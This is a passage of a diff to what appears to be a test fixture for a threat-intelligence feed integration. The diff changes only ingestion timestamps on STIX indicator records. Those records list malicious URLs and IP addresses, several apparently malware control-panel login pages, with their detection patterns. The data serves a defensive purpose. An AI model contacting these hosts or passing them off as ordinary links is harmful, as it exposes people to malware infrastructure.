"threat", "type": "indicator", @@ -2061,7 +2061,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022806800Z", + "ingested": "2021-12-14T14:57:43.118171950Z", "original": "{\"created\":\"2020-01-22T03:04:59.245Z\",\"description\":\"TS ID: 55241332380; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--ac821704-5eb2-4f8f-a8b6-2a168dbd0e54\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T03:04:59.245Z\",\"name\":\"mal_url: http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:04:59.245Z\"}", "category": "threat", "type": "indicator", @@ -2106,7 +2106,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022812200Z", + "ingested": "2021-12-14T14:57:43.118172340Z", "original": "{\"created\":\"2020-01-23T03:00:22.287Z\",\"description\":\"TS ID: 55245868747; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--0d3e1bd8-0f16-4c22-b8a1-663ec255ad79\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-57\"],\"modified\":\"2020-01-23T03:00:22.287Z\",\"name\":\"mal_ip: 192.168.214.199\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.168.214.199']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:00:22.287Z\"}", "category": "threat", "type": "indicator", @@ -2158,7 +2158,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022816900Z", + "ingested": "2021-12-14T14:57:43.118172751Z", "original": "{\"created\":\"2020-01-23T03:01:11.329Z\",\"description\":\"TS ID: 55245868770; iType: mal_url; State: active; Org: Mills College; Source: CyberCrime\",\"id\":\"indicator--2cdd130a-c884-402d-b63c-e03f9448f5d9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-01-23T03:01:11.329Z\",\"name\":\"mal_url: http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:01:11.329Z\"}", "category": "threat", "type": "indicator", @@ -2210,7 +2210,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022821500Z", + "ingested": "2021-12-14T14:57:43.118173248Z", "original": "{\"created\":\"2020-01-23T03:01:36.682Z\",\"description\":\"TS ID: 55245868769; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--88e98e13-4bfd-4188-941a-f696a7b86b71\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-01-23T03:01:36.682Z\",\"name\":\"mal_url: http://imobiliariatirol.com/gh/panelnew/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://imobiliariatirol.com/gh/panelnew/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:01:36.682Z\"}", "category": "threat", "type": "indicator", @@ -2262,7 +2262,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022825600Z", + "ingested": "2021-12-14T14:57:43.118173686Z", "original": "{\"created\":\"2020-01-23T03:02:15.854Z\",\"description\":\"TS ID: 55245868772; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--27323b7d-85d3-4e89-8249-b7696925a772\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-23T03:02:15.854Z\",\"name\":\"mal_url: http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:02:15.854Z\"}", "category": "threat", "type": "indicator", @@ -2313,7 +2313,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022829900Z", + "ingested": "2021-12-14T14:57:43.118174121Z", "original": "{\"created\":\"2020-01-23T03:02:47.364Z\",\"description\":\"TS ID: 55245868766; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--b0639721-de55-48c6-b237-3859d61aecfb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-01-23T03:02:47.364Z\",\"name\":\"mal_url: http://f0392261.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0392261.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:02:47.364Z\"}", "category": "threat", "type": "indicator", @@ -2365,7 +2365,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022835500Z", + "ingested": "2021-12-14T14:57:43.118174764Z", "original": "{\"created\":\"2020-01-23T03:03:05.048Z\",\"description\":\"TS ID: 55245868749; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--677e714d-c237-42a1-b6b7-9145acd13eee\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-01-23T03:03:05.048Z\",\"name\":\"mal_url: http://89.160.20.156/panel/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:03:05.048Z\"}", "category": "threat", "type": "indicator", @@ -2417,7 +2417,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022843300Z", + "ingested": "2021-12-14T14:57:43.118175290Z", "original": "{\"created\":\"2020-01-23T03:03:15.734Z\",\"description\":\"TS ID: 55245868767; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--5baa1dbd-d74e-408c-92b5-0a9f97e4b87a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-01-23T03:03:15.734Z\",\"name\":\"mal_url: http://f0387404.xsph.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0387404.xsph.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:03:15.734Z\"}", "category": "threat", "type": "indicator", @@ -2469,7 +2469,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022850800Z", + "ingested": "2021-12-14T14:57:43.118175781Z", "original": "{\"created\":\"2020-01-23T03:03:42.599Z\",\"description\":\"TS ID: 55245868768; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--4563241e-5d2f-41a7-adb9-3925a5eeb1b1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-01-23T03:03:42.599Z\",\"name\":\"mal_url: http://a0386457.xsph.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://a0386457.xsph.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:03:42.599Z\"}", "category": "threat", "type": "indicator", @@ -2521,7 +2521,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022858400Z", + "ingested": "2021-12-14T14:57:43.118176171Z", "original": "{\"created\":\"2020-01-24T02:57:04.821Z\",\"description\":\"TS ID: 55250078037; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--70cb5d42-91d3-4efe-8c47-995fc0ac4141\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-24T02:57:04.821Z\",\"name\":\"mal_url: http://defenseisrael.com/dis/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://defenseisrael.com/dis/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:04.821Z\"}", "category": "threat", "type": "indicator", @@ -2566,7 +2566,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022866100Z", + "ingested": "2021-12-14T14:57:43.118176780Z", "original": "{\"created\":\"2020-01-24T02:57:04.857Z\",\"description\":\"TS ID: 55250078030; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--3aa712bb-b5d4-4632-bf50-48a4aeeaeb6d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-24T02:57:04.857Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:04.857Z\"}", "category": "threat", "type": "indicator", @@ -2617,7 +2617,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022873500Z", + "ingested": "2021-12-14T14:57:43.118177230Z", "original": "{\"created\":\"2020-01-24T02:57:04.883Z\",\"description\":\"TS ID: 55250078019; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--64227c7d-86ea-4146-a868-3decb5aa5f1d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-01-24T02:57:04.883Z\",\"name\":\"mal_url: http://lbfb3f03.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lbfb3f03.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:04.883Z\"}", "category": "threat", "type": "indicator", @@ -2669,7 +2669,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022881Z", + "ingested": "2021-12-14T14:57:43.118177668Z", "original": "{\"created\":\"2020-01-24T02:57:12.997Z\",\"description\":\"TS ID: 55250078035; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--37fcf9a7-1a90-4d81-be0a-e824a4fa938e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-24T02:57:12.997Z\",\"name\":\"mal_url: http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:12.997Z\"}", "category": "threat", "type": "indicator", @@ -2721,7 +2721,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022886400Z", + "ingested": "2021-12-14T14:57:43.118178161Z", "original": "{\"created\":\"2020-01-24T02:57:13.025Z\",\"description\":\"TS ID: 55250078008; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--5a38786f-107e-4060-a7c9-ea8a5ded6aac\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-24T02:57:13.025Z\",\"name\":\"mal_url: http://199.192.168.11/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://199.192.168.11/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:13.025Z\"}", "category": "threat", "type": "indicator", @@ -2773,7 +2773,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022890500Z", + "ingested": "2021-12-14T14:57:43.118178673Z", "original": "{\"created\":\"2020-01-24T02:57:32.901Z\",\"description\":\"TS ID: 55250078038; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--3eb79b31-1d6d-438c-a848-24a3407f6e32\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:57:32.901Z\",\"name\":\"mal_url: http://89.160.20.156/aW8bVds1/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/aW8bVds1/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:32.901Z\"}", "category": "threat", "type": "indicator", @@ -2824,7 +2824,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022895900Z", + "ingested": "2021-12-14T14:57:43.118179120Z", "original": "{\"created\":\"2020-01-24T02:57:32.929Z\",\"description\":\"TS ID: 55250078026; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--a050832c-db6e-49a0-8470-7a3cd8f17178\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-24T02:57:32.929Z\",\"name\":\"mal_url: http://lansome.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lansome.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:32.929Z\"}", "category": "threat", "type": "indicator", @@ -2876,7 +2876,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022903400Z", + "ingested": "2021-12-14T14:57:43.118179527Z", "original": "{\"created\":\"2020-01-24T02:57:49.028Z\",\"description\":\"TS ID: 55250078034; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--e88008f4-76fc-428d-831a-4b389e48b712\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-24T02:57:49.028Z\",\"name\":\"mal_url: http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:49.028Z\"}", "category": "threat", "type": "indicator", @@ -2928,7 +2928,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022910900Z", + "ingested": "2021-12-14T14:57:43.118180021Z", "original": "{\"created\":\"2020-01-24T02:58:03.345Z\",\"description\":\"TS ID: 55250078032; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--dafe91cf-787c-471c-9afe-f7bb20a1b93f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-01-24T02:58:03.345Z\",\"name\":\"mal_url: http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:03.345Z\"}", "category": "threat", "type": "indicator", @@ -2980,7 +2980,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022918400Z", + "ingested": "2021-12-14T14:57:43.118180466Z", "original": "{\"created\":\"2020-01-24T02:58:16.318Z\",\"description\":\"TS ID: 55250078031; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--232bdc34-44cb-4f41-af52-f6f1cd28818e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-24T02:58:16.318Z\",\"name\":\"mal_url: http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:16.318Z\"}", "category": "threat", "type": "indicator", @@ -3032,7 +3032,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022923900Z", + "ingested": "2021-12-14T14:57:43.118180955Z", "original": "{\"created\":\"2020-01-24T02:58:16.358Z\",\"description\":\"TS ID: 55250078027; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--4adabe80-3be4-401a-948a-f9724c872374\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-66\"],\"modified\":\"2020-01-24T02:58:16.358Z\",\"name\":\"mal_url: http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:16.358Z\"}", "category": "threat", "type": "indicator", @@ -3083,7 +3083,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022927600Z", + "ingested": "2021-12-14T14:57:43.118181340Z", "original": "{\"created\":\"2020-01-24T02:58:32.126Z\",\"description\":\"TS ID: 55250078013; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--1d7051c0-a42b-4801-bd7f-f0abf2cc125c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:58:32.126Z\",\"name\":\"mal_url: http://suspiciousactivity.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://suspiciousactivity.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:32.126Z\"}", "category": "threat", "type": "indicator", @@ -3134,7 +3134,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022931700Z", + "ingested": "2021-12-14T14:57:43.118181881Z", "original": "{\"created\":\"2020-01-24T02:58:37.603Z\",\"description\":\"TS ID: 55250078017; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--fb06856c-8aad-4fae-92fc-b73aae4f6dc7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:58:37.603Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:37.603Z\"}", "category": "threat", "type": "indicator", @@ -3185,7 +3185,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022936Z", + "ingested": "2021-12-14T14:57:43.118182582Z", "original": "{\"created\":\"2020-01-24T02:58:37.643Z\",\"description\":\"TS ID: 55250078012; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--33e674f5-a64a-48f4-9d8c-248348356135\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-01-24T02:58:37.643Z\",\"name\":\"mal_url: http://f0387550.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0387550.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:37.643Z\"}", "category": "threat", "type": "indicator", @@ -3236,7 +3236,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022941300Z", + "ingested": "2021-12-14T14:57:43.118182964Z", "original": "{\"created\":\"2020-01-24T02:58:39.465Z\",\"description\":\"TS ID: 55250078018; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--6311f539-1d5d-423f-a238-d0c1dc167432\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-24T02:58:39.465Z\",\"name\":\"mal_url: http://lf4e4abf.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lf4e4abf.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:39.465Z\"}", "category": "threat", "type": "indicator", @@ -3281,7 +3281,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022945400Z", + "ingested": "2021-12-14T14:57:43.118183457Z", "original": "{\"created\":\"2020-01-24T02:59:02.031Z\",\"description\":\"TS ID: 55250078033; iType: mal_ip; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--1c91f219-cfa6-44c7-a5ee-1c760489b43c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-24T02:59:02.031Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:02.031Z\"}", "category": "threat", "type": "indicator", @@ -3333,7 +3333,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022951800Z", + "ingested": "2021-12-14T14:57:43.118183976Z", "original": "{\"created\":\"2020-01-24T02:59:15.878Z\",\"description\":\"TS ID: 55250078010; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime\",\"id\":\"indicator--c58983e2-18fd-47b8-aab4-6c8a2e2dcb35\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-01-24T02:59:15.878Z\",\"name\":\"mal_url: http://67.215.224.101/a1/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://67.215.224.101/a1/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:15.878Z\"}", "category": "threat", "type": "indicator", @@ -3378,7 +3378,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022956800Z", + "ingested": "2021-12-14T14:57:43.118184419Z", "original": "{\"created\":\"2020-01-24T02:59:29.155Z\",\"description\":\"TS ID: 55250078000; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--1ab178a8-7991-4879-b9aa-8da49f40e92e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-01-24T02:59:29.155Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:29.155Z\"}", "category": "threat", "type": "indicator", @@ -3429,7 +3429,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022962200Z", + "ingested": "2021-12-14T14:57:43.118184799Z", "original": "{\"created\":\"2020-01-24T02:59:50.233Z\",\"description\":\"TS ID: 55250078020; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--d5bdff38-6939-4a47-8e11-b910520565c4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-78\"],\"modified\":\"2020-01-24T02:59:50.233Z\",\"name\":\"mal_url: http://l60bdd58.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l60bdd58.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:50.233Z\"}", "category": "threat", "type": "indicator", @@ -3481,7 +3481,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022966700Z", + "ingested": "2021-12-14T14:57:43.118185258Z", "original": "{\"created\":\"2020-01-24T02:59:50.255Z\",\"description\":\"TS ID: 55250078009; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--1be74977-5aa6-4175-99dd-32b54863a06b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-25\"],\"modified\":\"2020-01-24T02:59:50.255Z\",\"name\":\"mal_url: http://89.160.20.156/~giftioz/.azma/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/~giftioz/.azma/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:50.255Z\"}", "category": "threat", "type": "indicator", @@ -3532,7 +3532,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022970800Z", + "ingested": "2021-12-14T14:57:43.118185645Z", "original": "{\"created\":\"2020-01-24T02:59:52.536Z\",\"description\":\"TS ID: 55250078023; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--eacc25ce-584c-4b40-98ab-7935dabd5cb1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-78\"],\"modified\":\"2020-01-24T02:59:52.536Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:52.536Z\"}", "category": "threat", "type": "indicator", @@ -3583,7 +3583,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022975Z", + "ingested": "2021-12-14T14:57:43.118186078Z", "original": "{\"created\":\"2020-01-24T02:59:54.784Z\",\"description\":\"TS ID: 55250078025; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--504f4011-eaea-4921-aad5-f102bef7c798\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-01-24T02:59:54.784Z\",\"name\":\"mal_url: http://trotdeiman.ga/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trotdeiman.ga/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:54.784Z\"}", "category": "threat", "type": "indicator", @@ -3628,7 +3628,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022978700Z", + "ingested": "2021-12-14T14:57:43.118186472Z", "original": "{\"created\":\"2020-01-24T02:59:54.815Z\",\"description\":\"TS ID: 55250078014; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--e3ffb953-6c59-461a-8242-0d26c2b5c358\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:59:54.815Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:54.815Z\"}", "category": "threat", "type": "indicator", @@ -3673,7 +3673,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022983900Z", + "ingested": "2021-12-14T14:57:43.118187016Z", "original": "{\"created\":\"2020-01-24T03:00:01.726Z\",\"description\":\"TS ID: 55250078036; iType: mal_ip; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--3a47ad46-930d-4ced-b0e7-dc9d0776153e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-24T03:00:01.726Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = 